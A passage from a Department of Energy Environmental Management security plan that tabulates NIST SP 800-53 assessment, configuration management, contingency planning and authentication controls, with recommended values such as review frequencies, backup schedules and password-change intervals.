The organization: Reviewsand updates InterconnectionSecurity Agreements[Assignment: organization-defined frequency].
At least annually orwhen changes are made
to any interfacecontrols documented in
the agreement.
CA-3
5Information System
Connections
The organization employs[Selection: allow-all, deny-by-exception; deny-all,permit-by-exception] policyfor allowing [Assignment:organization-definedinformation systems] toconnect to externalinformation systems.
CA-5
0 aPlan of Action and
Milestones
The organization: Developsa plan of action andmilestones for theinformation system todocument the organization’splanned remedial actions tocorrect weaknesses ordeficiencies noted duringthe assessment of thesecurity controls and toreduce or eliminate knownvulnerabilities in thesystem; and
Actions that will takesignificant resources and willtake 90 days or more will bedocumented in a POA&Mwithin eGovRPM.
CA-5
0 bPlan of Action and
Milestones
The organization: Updatesexisting plan of action andmilestones [Assignment:organization-definedfrequency] based on thefindings from securitycontrols assessments,security impact analyses,and continuous monitoringactivities.
Quarterly
CA-6
0 a Security Authorization
The organization: Assigns asenior-level executive ormanager to the role ofauthorizing official for theinformation system;
CA-6
0 b Security Authorization
The organization: Ensuresthat the authorizing officialauthorizes the informationsystem for processing beforecommencing operations;and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
63 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CA-6
0 c Security Authorization
The organization: Updatesthe security authorization[Assignment: organization-defined frequency].
The site may either updatethe authorization on a yearlybasis (based on ContinuousMonitoring assessments) orevery three years
CA-7
0 aContinuousMonitoring
The organization establishesa continuous monitoringstrategy and implements acontinuous monitoringprogram that includes:Establishment of[Assignment: organization-defined metrics] to bemonitored;
.
A continuous monitoringprogram allows anorganization to maintain thesecurity authorization of aninformation system over timein a highly dynamicenvironment of operationwith changing threats,vulnerabilities, technologies,and missions/businessprocesses. EM HQ assistswith this as a service to allEM Sites. Program levelmetrics have been developedand are available via the EMPortal.
CA-7
0 bContinuousMonitoring
Establishment of[Assignment: organization-defined frequencies] formonitoring and[Assignment: organization-defined frequencies] forassessments supporting suchmonitoring;
CA-7
0 cContinuousMonitoring
Ongoing security controlassessments in accordancewith the organizationalcontinuous monitoringstrategy; and
CA-7
0 dContinuousMonitoring
Ongoing security statusmonitoring of organization-defined metrics inaccordance with theorganizational continuousmonitoring strategy;
CA-7
0 eContinuousMonitoring
Correlation and analysis ofsecurity-related informationgenerated by assessmentsand monitoring;
CA-7
0 fContinuousMonitoring
Response actions to addressresults of the analysis ofsecurity-related information;and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
64 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CA-7
0 gContinuousMonitoring
Reporting the security statusof organization and theinformation system to[Assignment: organization-defined personnel or roles][Assignment: organization-defined frequency].
AODR & AO annuallyas part of CM process
CA-7
1ContinuousMonitoring
The organization employsassessors or assessmentteams with [Assignment:organization-defined levelof independence] to monitorthe security controls in theinformation system on anongoing basis.
This is performed as a serviceby EM HQ.
CA-9
0 aInternal System
Connections
The organization Authorizesinternal connections of[Assignment: organization-defined information systemcomponents or classes ofcomponents] to theinformation system; and
CA-9
0 bInternal System
Connections
The organizationdocuments, for each internalconnection, the interfacecharacteristics, securityrequirements, and the natureof the informationcommunicated.
CM-1
0 a 1Configuration
Management Policyand Procedures
The organization:Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A configurationmanagement policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
65 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-1
0 a 2Configuration
Management Policyand Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of theconfiguration managementpolicy and associatedconfiguration managementcontrols; and
Security Staff andAdministrative Staff
CM-1
0 b 1Configuration
Management Policyand Procedures
Reviews and updates thecurrent: Configurationmanagement policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
CM-1
0 b 2Configuration
Management Policyand Procedures
Reviews and updates thecurrent: Configurationmanagement procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
CM-2
ConfigurationBaseline
The organization develops,documents, and maintainsunder configuration control,a current baselineconfiguration of theinformation system.
This control establishes abaseline configuration for theinformation system and itsconstituent componentsincluding communicationsand connectivity-relatedaspects of the system. Thebaseline configurationprovides information aboutthe components of aninformation system (e.g., thestandard software load for aworkstation, server, networkcomponent, or mobile deviceincluding operatingsystem/installed applicationswith current version numbersand patch information),network topology, and thelogical placement of thecomponent within the systemarchitecture.
CM-2
1 a -Configuration
Baseline
The organization reviewsand updates the baselineconfiguration of theinformation system:[Assignment: organization-defined frequency];
As needed or at leastannually
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
66 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-2
1 b -Configuration
Baseline
The organization reviewsand updates the baselineconfiguration of theinformation system: Whenrequired due to [Assignmentorganization-definedcircumstances]; and
Annually or any timethere is a major change
CM-2
1 c -Configuration
Baseline
The organization reviewsand updates the baselineconfiguration of theinformation system: As anintegral part of informationsystem componentinstallations and upgrades.
CM-2
3Configuration
Baseline
The organization retains[Assignment: organization-defined previous versions ofbaseline configurations ofthe information system] tosupport rollback.
Two versions
CM-2
7 aConfiguration
Baseline
The organization: Issues[Assignment: organization-defined informationsystems, systemcomponents, or devices]with [Assignment:organization-definedconfigurations] toindividuals traveling tolocations that theorganization deems to be ofsignificant risk; and
The suggestion here is tohave a cache of mobiledevices that would be usedon foreign travel. Thedevices would be cleanedprior to and after travel sothat no malware wouldremain if placed on thedevice while on travel. Also,digital imaging should beused in order to determine ifthe device was physicallyaltered. The DOE SafePassage Program is availableto EM sites.
CM-2
7 bConfiguration
Baseline
The organization: Applies[Assignment: organization-defined security safeguards]to the devices when theindividuals return.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
67 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-3
0 a -Configuration Change
Control
The organization:Determines the types ofchanges to the informationsystem that areconfiguration-controlled;
The site determines the typesof changes to the informationsystem that are configurationcontrolled. Configurationchange control for theinformation system involvesthe systematic proposal,justification, implementation,test/evaluation, review, anddisposition of changes to thesystem, including upgradesand modifications.
CM-3
b -Configuration Change
Control
The organization: Reviewsproposed configuration-controlled changes to theinformation system andapproves or disapprovessuch changes with explicitconsideration for securityimpact analyses;
CM-3
c -Configuration Change
Control
The organization:Documents configurationchange decisions associatedwith the informationsystem;
CM-3
d -Configuration Change
Control
The organization:Implements approvedconfiguration-controlledchanges to the informationsystem;
CM-3
e -Configuration Change
Control
The organization: Retainsrecords of configuration-controlled changes to theinformation system for[Assignment: organization-defined time period];
CM-3
f -Configuration Change
Control
The organization: Auditsand reviews activitiesassociated withconfiguration-controlledchanges to the informationsystem; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
68 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-3
g -Configuration Change
Control
The organization:Coordinates and providesoversight for configurationchange control activitiesthrough [Assignment:organization-definedconfiguration changecontrol element (e.g.,committee, board] thatconvenes [Selection (one ormore): [Assignment:organization-definedfrequency]; [Assignment:organization-definedconfiguration changeconditions]].
A change control boardthat convenes at least
monthly or morefrequently if needed to
review andapprove/disapprove
changes
CM-3
2 -Configuration Change
Control
The organization tests,validates, and documentschanges to the informationsystem before implementingthe changes on theoperational system.
CM-4
-Security Impact
Analyses
The organization analyzeschanges to the informationsystem to determinepotential security impactsprior to changeimplementation.
Security impact analysis mayinclude, for example,reviewing informationsystem documentation suchas the security plan tounderstand how specificsecurity controls areimplemented within thesystem and how the changesmight affect the controls.Security impact analysis mayalso include an assessment ofrisk to understand the impactof the changes and todetermine if additionalsecurity controls are required.Security impact analysis isscaled in accordance with thesecurity categorization of theinformation system.
CM-5
-Access Restrictions
for Change
The organization defines,documents, approves, andenforces physical andlogical access restrictionsassociated with changes tothe information system.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
69 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-6
a - Configuration Settings
The organizationEstablishes and documentsconfiguration settings forinformation technologyproducts employed withinthe information systemusing [Assignment:organization-definedsecurity configurationchecklists] that reflect themost restrictive modeconsistent with operationalrequirements;
Baseline checklist suchas USGCB, SCAP, orCIS for its different
kinds of systems
Configuration settings are theconfigurable security-relatedparameters of informationtechnology products that arepart of the informationsystem. Security-relatedparameters are thoseparameters impacting thesecurity state of the systemincluding parameters relatedto meeting other securitycontrol requirements.Security-related parametersinclude, for example, registrysettings; account, file, anddirectory settings (i.e.,permissions); and settings forservices, ports, protocols, andremote connections.
CM-6
b - Configuration SettingsThe organization:Implements theconfiguration settings;
CM-6
c - Configuration Settings
The organization Identifies,documents, and approvesany deviations fromestablished configurationsettings for [Assignment:organization-definedinformation systemcomponents] based on[Assignment: organization-defined operationalrequirements]; and
CM-6
d - Configuration Settings
The organization: Monitorsand controls changes to theconfiguration settings inaccordance withorganizational policies andprocedures.
CM-7
0 a - Least Functionality
The organization:Configures the informationsystem to provide onlyessential capabilities; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
70 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-7
0 b - Least Functionality
The organization: Prohibitsor restricts the use of thefollowing functions, ports,protocols, and/or services:[Assignment: organization-defined prohibited orrestricted functions, ports,protocols, and/orservices].
Any function, port,protocol or service notspecifically required
for the operation of theinformation system and
those specificallyprohibited by the AO
The functions and servicesprovided by organizationalinformation systems, orindividual components ofinformation systems, arecarefully reviewed todetermine which functionsand services are candidatesfor elimination (e.g., VoiceOver Internet Protocol,Instant Messaging, auto-execute, file sharing).Organizations considerdisabling unused orunnecessary physical andlogical ports and protocols(e.g., Universal Serial Bus[USB], File Transfer Protocol[FTP], Internet ProtocolVersion 6 [IPv6], Hyper TextTransfer Protocol [HTTP])on information systemcomponents to preventunauthorized connection ofdevices, unauthorizedtransfer of information, orunauthorized tunneling.Organizations can utilizenetwork scanning tools,intrusion detection andprevention systems, and end-point protections such asfirewalls and host-basedintrusion detection systems toidentify identify and preventthe use of prohibitedfunctions, ports, protocols,and services.
CM-7
1 a - Least Functionality
The organization: Reviewsthe information system[Assignment: organization-defined frequency] toidentify unnecessary and/ornon-secure functions, ports,protocols, and services; and
Annually
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
71 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-7
1 b - Least Functionality
The organization: Disables[Assignment: organization-defined functions, ports,protocols, and serviceswithin the informationsystem deemed to beunnecessary and/or non-secure].
Disable all that are notnecessary.
CM-7
2 - Least Functionality
The information systemprevents program executionin accordance with[Selection (one or more):[Assignment: organization-defined policies regardingsoftware program usage andrestrictions];rules authorizing the termsand conditions of softwareprogram usage].
CM-7
4 a - Least Functionality
The organization: Identifies[Assignment: organization-defined software programsnot authorized to execute onthe information system];
CM-7
4 b - Least Functionality
The organization: Employsan allow-all, deny-by-exception policy to prohibitthe execution ofunauthorized softwareprograms on the informationsystem; and
CM-7
4 c - Least Functionality
The organization: Reviewsand updates the list ofunauthorized softwareprograms [Assignment:organization definedfrequency].
Annually
CM-8
0 a 1Information System
Component Inventory
The organization: Developsand documents an inventoryof information systemcomponents that:Accurately reflects thecurrent information system;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
72 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-8
0 a 2Information System
Component Inventory
The organization: Developsand documents an inventoryof information systemcomponents that: Includesall components within theauthorization boundary ofthe information system;
This function should beautomated and the SSPcontrol statement shouldpoint to the system (e.g.,Tenable Security Center)
CM-8
0 a 3Information System
Component Inventory
The organization: Developsand documents an inventoryof information systemcomponents that: Is at thelevel of granularity deemednecessary for tracking andreporting; and
This function should beautomated and the SSPcontrol statement shouldpoint to the system (e.g.,Tenable Security Center)
CM-8
0 a 4Information System
Component Inventory
The organization: Developsand documents an inventoryof information systemcomponents that: Includes[Assignment: organization-defined information deemednecessary to achieveeffective information systemcomponent accountability];and
Device type, model, serialnumber or tracking number,location, and owner nameand phone number
CM-8
0 b -Information System
Component Inventory
The organization: Reviewsand updates the informationsystem componentinventory [Assignment:organization-definedfrequency].
CM-8
1Information System
Component Inventory
The organization updatesthe inventory of informationsystem components as anintegral part of componentinstallations, removals, andinformation system updates.
CM-8
3 aInformation System
Component Inventory
The organization Employsautomated mechanisms[Assignment: organization-defined frequency] to detectthe presence of unauthorizedhardware, software, andfirmware componentswithin the informationsystem; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
73 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-8
3 bInformation System
Component Inventory
The organization: Takes thefollowing actions whenunauthorized componentsare detected: [Selection (oneor more): disables networkaccess by such components;isolates the components;notifies [Assignment:organization-definedpersonnel or roles]].
CM-8
5Information System
Component Inventory
The organization verifiesthat all components withinthe authorization boundaryof the information systemare not duplicated in otherinformation systeminventories.
CM-9
a -Configuration
Management Plan
The organization develops,documents, and implementsa configuration managementplan for the informationsystem that: Addressesroles, responsibilities, andconfiguration managementprocesses and procedures;
The configurationmanagement plan satisfiesthe requirements in theorganization’s configurationmanagement policy whilebeing tailored to theindividual informationsystem. The configurationmanagement plan definesdetailed processes andprocedures for howconfiguration management isused to support systemdevelopment life cycleactivities at the informationsystem level. The plandescribes how to move achange through the changemanagement process, howconfiguration settings andconfiguration baselines areupdated, how the informationsystem component inventoryis maintained, howdevelopment, test, andoperational environments arecontrolled, and finally, howdocuments are developed,released, and updated.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
74 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-9
b -Configuration
Management Plan
The organization develops,documents, and implementsa configuration managementplan for the informationsystem that: Establishes aprocess for identifyingconfiguration itemsthroughout the systemdevelopment life cycle andfor managing theconfiguration of theconfiguration items;
CM-9
c -Configuration
Management Plan
The organization develops,documents, and implementsa configuration managementplan for the informationsystem that: Defines theconfiguration items for theinformation system andplaces the configurationitems under configurationmanagement; and
CM-9
d -Configuration
Management Plan
The organization develops,documents, and implementsa configuration managementplan for the informationsystem that: Protects theconfiguration managementplan from unauthorizeddisclosure and modification.
CM-10
0 aSoftware Usage
Restrictions
The organization: Usessoftware and associateddocumentation inaccordance with contractagreements and copyrightlaws;
CM-10
0 bSoftware Usage
Restrictions
The organization: Tracks theuse of software andassociated documentationprotected by quantitylicenses to control copyingand distribution; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
75 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CM-10
0 cSoftware Usage
Restrictions
The organization: Controlsand documents the use ofpeer-to-peer file sharingtechnology to ensure thatthis capability is not usedfor the unauthorizeddistribution, display,performance, orreproduction of copyrightedwork.
CM-11
0 aUser-Installed
Software
The organization:Establishes [Assignment:organization-definedpolicies] governing theinstallation of software byusers;
CM-11
0 bUser-Installed
Software
The organization: Enforcessoftware installation policiesthrough [Assignment:organization-definedmethods]; and
CM-11
0 cUser-Installed
Software
The organization: Monitorspolicy compliance at[Assignment: organization-defined frequency].
CP-1 0 a 1Contingency PlanningPolicy and Procedures
The organization develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A contingency planningpolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
CP-1 0 a 2Contingency PlanningPolicy and Procedures
The organization develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thecontingency planning policyand associated contingencyplanning controls; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
76 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-1 0 b 1Contingency PlanningPolicy and Procedures
The organization Reviewsand updates the currentContingency planningpolicy [Assignment:organization-definedfrequency]; and
Annually or any timethere is a major change
CP-1 1 b 2Contingency PlanningPolicy and Procedures
The organization Reviewsand updates the currentContingency planningprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
CP-2 0 a 1 Contingency Plan
The Organization develops acontingency plan for theinformation system thatIdentifies essential missionsand business functions andassociated contingencyrequirements;
CP-2 0 a 2 Contingency Plan
The Organization develops acontingency plan for theinformation system thatProvides recoveryobjectives, restorationpriorities, and metrics;
CP-2 0 a 3 Contingency Plan
Addresses contingencyroles, responsibilities,assigned individuals withcontact information;
CP-2 0 a 4 Contingency Plan
The Organization develops acontingency plan for theinformation system thatAddresses maintainingessential missions andbusiness functions despitean information systemdisruption, compromise, orfailure;
CP-2 0 a 5 Contingency Plan
The Organization develops acontingency plan for theinformation system thatAddresses eventual, fullinformation systemrestoration withoutdeterioration of the securitymeasures originally plannedand implemented; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
77 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-2 0 a 6 Contingency Plan
The Organization develops acontingency plan for theinformation system that Isreviewed and approved bydesignated officials withinthe organization;
CP-2 0 b Contingency Plan
The organization distributescopies of the contingencyplan to [Assignment:organization-defined list ofkey contingency personnel(identified by name and/orby role) and organizationalelements];
System owner,business function,
AODR, ISSM, ISSO,system admins andphysical security.
CP-2 0 c Contingency Plan
The Organizationcoordinates contingencyplanning activities withincident handling activities;
CP-2 0 d Contingency Plan
The organization reviewsthe contingency plan for theinformation system[Assignment: organization-defined frequency];
Annually
CP-2 0 e Contingency Plan
The organization updatesthe contingency plan toaddress changes to theorganization, informationsystem, or environment ofoperation and problemsencountered duringcontingency planimplementation, execution,or testing;
CP-2 0 f Contingency Plan
The organizationcommunicates contingencyplan changes to[Assignment: organization-defined key contingencypersonnel (identified byname and/or by role) andorganizational elements];and
System owner,business function,
AODR, ISSM, ISSO,system admins andphysical security.
CP-2 0 g Contingency Plan
The organization protectsthe contingency plan fromunauthorized disclosure andmodification.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
78 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-2 1 Contingency Plan
The organizationcoordinates contingencyplan development withorganizational elementsresponsible for relatedplans.
CP-2 3 Contingency Plan
The organization plans forthe resumption of essentialmissions and businessfunctions within[Assignment: organization-defined time period] ofcontingency plan activation.
CP-2 8 Contingency Plan
The organization identifiescritical information systemassets supporting essentialmissions and businessfunctions.
CP-3 0 a Contingency Training
The organization providescontingency training toinformation system usersconsistent with assignedroles and responsibilities:Within [Assignment:organization-defined timeperiod] of assuming acontingency role orresponsibility;
CP-3 0 b Contingency Training
The organization providescontingency training toinformation system usersconsistent with assignedroles and responsibilities:When required byinformation system changes;and
CP-3 0 c Contingency Training
The organization providescontingency training toinformation system usersconsistent with assignedroles and responsibilities:[Assignment: organization-defined frequency]thereafter.
Annually
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
79 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-4 0 aContingency Plan
Testing
The Organization Tests thecontingency plan for theinformation system[Assignment: organization-defined frequency] using[Assignment: organization-defined tests] to determinethe effectiveness of the planand the organizationalreadiness to execute theplan;
The CP is testedannually by table top
exercises one year andsimulated/live exercise
every other year foreffectiveness and
ability to meetcontingencies
There are several methods fortesting and/or exercisingcontingency plans to identifypotential weaknesses (e.g.,checklist, walk-through/tabletop, simulation:parallel, full interrupt).Contingency plan testingand/or exercises include adetermination of the effectson site operations and assets(e.g., reduction in missioncapability) and individualsarising due to contingencyoperations in accordance withthe plan.
CP-4 0 bContingency Plan
Testing
The organization Reviewsthe contingency plan testresults; and
CP-4 1 cContingency Plan
TestingThe organization Initiatescorrective actions, if needed.
CP-4 1Contingency Plan
Testing
The organizationcoordinates contingencyplan testing withorganizational elementsresponsible for relatedplans.
CP-6 0 a Alternate Storage Site
The organization establishesan alternate storage siteincluding necessaryagreements to permit thestorage and retrieval ofinformation system backupinformation; and
CP-6 0 b Alternate Storage Site
The organization ensuresthat the alternate storage siteprovides informationsecurity safeguardsequivalent to that of theprimary site.
CP-6 1 Alternate Storage Site
The organization identifiesan alternate storage site thatis separated from theprimary storage site toreduce susceptibility to thesame threats.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
80 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-6 3 Alternate Storage Site
The organization identifiespotential accessibilityproblems to the alternatestorage site in the event ofan area-wide disruption ordisaster and outlines explicitmitigation actions.
CP-7 0 aAlternate Processing
Site
The organization establishesan alternate processing siteincluding necessaryagreements to permit thetransfer and resumption of[Assignment: organization-defined information systemoperations] for essentialmissions/business functionswithin [Assignment:organization-defined timeperiod consistent withrecovery time and recoverypoint objectives] when theprimary processingcapabilities are unavailable;
The site has developed analternate processing site thatis approved (throughagreements) and that allowsthe site to meet the missionrequirements (one dayrecommended)
CP-7 0 bAlternate Processing
Site
The organization ensuresthat equipment and suppliesrequired to transfer andresume operations areavailable at the alternateprocessing site or contractsare in place to supportdelivery to the site withinthe organization-definedtime period fortransfer/resumption; and
CP-7 0 cAlternate Processing
Site
The organization ensuresthat the alternate processingsite provides informationsecurity safeguardsequivalent to that of theprimary site.
CP-7 1Alternate Processing
Site
The organization identifiesan alternate processing sitethat is separated from theprimary processing site toreduce susceptibility to thesame threats.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
81 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-7 2Alternate Processing
Site
The organization identifiespotential accessibilityproblems to the alternateprocessing site in the eventof an area-wide disruptionor disaster and outlinesexplicit mitigation actions.
CP-7 3Alternate Processing
Site
The organization developsalternate processing siteagreements that containpriority-of-serviceprovisions in accordancewith organizationalavailability requirements(including recovery timeobjectives).
CP-8 0Telecommunications
Services
The organization establishesalternatetelecommunications servicesincluding necessaryagreements to permit theresumption of [Assignment:organization-definedinformation systemoperations] for essentialmissions and businessfunctions within[Assignment: organization-defined time period] whenthe primarytelecommunicationscapabilities are unavailableat either the primary oralternate processing orstorage sites.
The site establishes alternatetelecommunications servicesagreements to meet themission restorationrequirements (in accordancewith BIA) (Recommend onebusiness day maximum)
CP-8 1 aTelecommunications
Services
The organization developsprimary and alternatetelecommunications serviceagreements that containpriority-of-serviceprovisions in accordancewith organizationalavailability requirements(including recovery timeobjectives); and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
82 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-8 1 bTelecommunications
Services
The organization requestsTelecommunicationsService Priority for alltelecommunications servicesused for national securityemergency preparedness inthe event that the primaryand/or alternatetelecommunications servicesare provided by a commoncarrier.
CP-8 2Telecommunications
Services
The organization obtainsalternatetelecommunications servicesto reduce the likelihood ofsharing a single point offailure with primarytelecommunicationsservices.
CP-9 0 aInformation System
Backup
The organization conductsbackups of user-levelinformation contained in theinformation system[Assignment: organization-defined frequency consistentwith recovery time andrecovery point objectives];
Daily
CP-9 0 bInformation System
Backup
The organization conductsbackups of system-levelinformation contained in theinformation system[Assignment: organization-defined frequency consistentwith recovery time andrecovery point objectives];
CP-9 0 cInformation System
Backup
The organization conductsbackups of informationsystem documentationincluding security-relateddocumentation[Assignment: organization-defined frequency consistentwith recovery time andrecovery point objectives];and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
83 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
CP-9 0 dInformation System
Backup
The organization protectsthe confidentiality andintegrity of backupinformation at the storagelocation.
CP-9 1Information System
Backup
The organization testsbackup information[Assignment: organization-defined frequency] to verifymedia reliability andinformation integrity.
At least annually
CP-10
0Information System
Recovery andReconstitution
The organization providesfor the recovery andreconstitution of theinformation system to aknown state after adisruption, compromise, orfailure.
CP-10
2Information System
Recovery andReconstitution
The information systemimplements transactionrecovery for systems thatare transaction-based.
IA-1 0 a 1Identification and
Authentication Policyand Procedures
The organization: develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:An identification andauthentication policy thataddresses purpose, scope,roles, responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
IA-1 0 a 2Identification and
Authentication Policyand Procedures
The organization: develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of theidentification andauthentication policy andassociated identification andauthentication controls; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
84 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-1 0 b 1Identification and
Authentication Policyand Procedures
The organization reviewsand updates the current:Identification andauthentication policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
IA-1 0 b 2Identification and
Authentication Policyand Procedures
The organization reviewsand updates the current:Identification andauthentication procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
IA-2 0Identification and
Authentication(Organizational Users)
The information systemuniquely identifies andauthenticates organizationalusers (or processes acting onbehalf of organizationalusers).
IA-2 1Identification and
Authentication(Organizational Users)
The information systemimplements multifactorauthentication for networkaccess to privilegedaccounts.
IA-2 2Identification and
Authentication(Organizational Users)
The information systemimplements multifactorauthentication for networkaccess to non-privilegedaccounts.
IA-2 3Identification and
Authentication(Organizational Users)
The information systemimplements multifactorauthentication for localaccess to privilegedaccounts.
IA-2 8Identification and
Authentication(Organizational Users)
The information systemimplements replay-resistantauthentication mechanismsfor network access toprivileged accounts.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
85 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-2 11Identification and
Authentication(Organizational Users)
The information systemimplements multifactorauthentication for remoteaccess to privileged andnon-privileged accountssuch that one of the factorsis provided by a deviceseparate from the systemgaining access and thedevice meets [Assignment:organization-definedstrength of mechanismrequirements].
IA-2 12Identification and
Authentication(Organizational Users)
The information systemaccepts and electronicallyverifies Personal IdentityVerification (PIV)credentials.
IA-3 0Device Identificationand Authentication
The information systemuniquely identifies andauthenticates [Assignment:organization definedspecific and/or types ofdevices] before establishinga [Selection (one or more):local; remote; network]connection.
Single useauthenticators beforeestablishing a remote
connection
IA-4 0 a Identifier Management
The organization managesinformation systemidentifiers by: Receivingauthorization from[Assignment: organization-defined personnel or roles]to assign an individual,group, role, or deviceidentifier;
All personnel
IA-4 0 b Identifier Management
The organization managesinformation systemidentifiers by: Selecting anidentifier that identifies anindividual, group, role, ordevice;
IA-4 0 c Identifier Management
The organization managesinformation systemidentifiers by: Assigning theidentifier to the intendedindividual, group, role, ordevice;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
86 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-4 0 d Identifier Management
The organization managesinformation systemidentifiers by: Preventingreuse of identifiers for[Assignment: organization-defined time period]; and
IA-4 0 e Identifier Management
The organization managesinformation systemidentifiers by: Disabling theidentifier after [Assignment:organization-defined timeperiod of inactivity].
90 days
IA-5 0 aAuthenticatorManagement
The organization managesinformation systemauthenticators by: Verifying,as part of the initialauthenticator distribution,the identity of theindividual, group, role, ordevice receiving theauthenticator;
IA-5 0 bAuthenticatorManagement
The organization managesinformation systemauthenticators by:Establishing initialauthenticator content forauthenticators defined bythe organization;
IA-5 0 cAuthenticatorManagement
The organization managesinformation systemauthenticators by: Ensuringthat authenticators havesufficient strength ofmechanism for theirintended use;
IA-5 0 dAuthenticatorManagement
The organization managesinformation systemauthenticators by:Establishing andimplementingadministrative proceduresfor initial authenticatordistribution, forlost/compromised ordamaged authenticators, andfor revoking authenticators;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
87 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-5 0 eAuthenticatorManagement
The organization managesinformation systemauthenticators by: Changingdefault content ofauthenticators prior toinformation systeminstallation
IA-5 0 fAuthenticatorManagement
The organization managesinformation systemauthenticators by:Establishing minimum andmaximum lifetimerestrictions and reuseconditions forauthenticators;
IA-5 0 gAuthenticatorManagement
The organization managesinformation systemauthenticators by:Changing/refreshingauthenticators [Assignment:organization-defined timeperiod by authenticatortype];
If passwords are still used therecommended time to force achange is 90 days or less. Ifmultifactor is used the pincan be changed every 6months.
IA-5 0 hAuthenticatorManagement
